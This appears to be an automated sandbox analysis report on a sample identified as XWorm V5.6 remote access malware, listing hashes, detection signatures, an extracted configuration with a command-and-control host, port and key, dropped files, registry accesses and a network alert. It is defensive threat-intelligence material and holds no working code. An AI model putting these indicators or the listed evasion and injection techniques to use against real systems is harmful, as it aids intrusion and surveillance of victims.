Windows Analysis Report
x433.exe

Overview

General Information

Sample name: x433.exe
Analysis ID: 1465714
MD5: 148ec472df90b0fb274c3ce2ad2e811f
SHA1: 378ba02b08494b36ff5a2674cf99eba6c7025d6a
SHA256: a08b846be9052a2614ef6a6920260d465774f5da9926f6d08449a2e4eb27b787
Tags: exe
Infos:

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains process injector
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Connects to many ports of the same IP (likely port scanning)
Contains functionality to capture screen (.Net source)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Found suspicious powershell code related to unpacking or dynamic code loading
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential WinAPI Calls Via CommandLine
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Very long command line found
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Uncommon Svchost Parent Process
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: x433.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Avira: detection malicious, Label: TR/Dropper.MSIL.Gen
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Avira: detection malicious, Label: HEUR/AGEN.1305769
Source: C:\Users\user\AppData\Local\x4usb.exe Avira: detection malicious, Label: HEUR/AGEN.1305769
Found malware configuration
Source: 00000000.00000002.1709422465.0000000002991000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Xworm {"C2 url": ["session-chief.gl.at.ply.gg"], "Port": "36125", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\x4host.exe ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\x4usb.exe ReversingLabs: Detection: 91%
Multi AV Scanner detection for submitted file
Source: x433.exe ReversingLabs: Detection: 76%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\x4usb.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: x433.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 0.2.x433.exe.29b77d8.1.raw.unpack String decryptor: session-chief.gl.at.ply.gg
Source: 0.2.x433.exe.29b77d8.1.raw.unpack String decryptor: 36125
Source: 0.2.x433.exe.29b77d8.1.raw.unpack String decryptor: <123456789>
Source: 0.2.x433.exe.29b77d8.1.raw.unpack String decryptor: <Xwormmm>
Source: 0.2.x433.exe.29b77d8.1.raw.unpack String decryptor: XWorm V5.6
Source: 0.2.x433.exe.29b77d8.1.raw.unpack String decryptor: USB.exe
Source: 0.2.x433.exe.29b77d8.1.raw.unpack String decryptor: %LocalAppData%
Source: 0.2.x433.exe.29b77d8.1.raw.unpack String decryptor: x4usb.exe
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Code function: 1_2_00401000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 1_2_00401000
Uses 32bit PE files
Source: x433.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: x433.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000F.00000000.1792926798.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2949912235.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: WINLOA~1.PDB source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000F.00000000.1792926798.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2949912235.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000F.00000000.1792926798.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2949912235.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000F.00000000.1792926798.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2949912235.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Creates COM task schedule object (often to register a task for autostart)
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD} Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs Jump to behavior
Source: C:\Windows\System32\dllhost.exe Code function: 5_2_000002D8B0A6E630 FindFirstFileExW, 5_2_000002D8B0A6E630
Source: C:\Windows\System32\winlogon.exe Code function: 6_2_00000225DC64E630 FindFirstFileExW, 6_2_00000225DC64E630
Source: C:\Windows\System32\lsass.exe Code function: 7_2_00000202C0AEE630 FindFirstFileExW, 7_2_00000202C0AEE630
Source: C:\Windows\System32\svchost.exe Code function: 8_2_000002A66130E630 FindFirstFileExW, 8_2_000002A66130E630
Source: C:\Windows\System32\dwm.exe Code function: 9_2_000002BAAE26E630 FindFirstFileExW, 9_2_000002BAAE26E630
Source: C:\Windows\System32\svchost.exe Code function: 10_2_0000026A879CE630 FindFirstFileExW, 10_2_0000026A879CE630
Source: C:\Windows\System32\svchost.exe Code function: 11_2_00000179537AE630 FindFirstFileExW, 11_2_00000179537AE630
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Code function: 4x nop then jmp 00007FFD9B88ED12h 2_2_00007FFD9B88EB44
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Code function: 4x nop then jmp 00007FFD9B88FEE4h 2_2_00007FFD9B88F869
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Code function: 4x nop then jmp 00007FFD9B88FEF5h 2_2_00007FFD9B88F869
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Code function: 4x nop then jmp 00007FFD9B890AB4h 2_2_00007FFD9B88BE28
Source: C:\Users\user\AppData\Local\Temp\x4host.exe Code function: 4x nop then jmp 00007FFD9B890AB4h 2_2_00007FFD9B88BE28

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2853192 ETPRO TROJAN Win32/XWorm V3 CnC Command - sendPlugin Outbound 192.168.2.4:49731 -> 147.185.221.20:36125
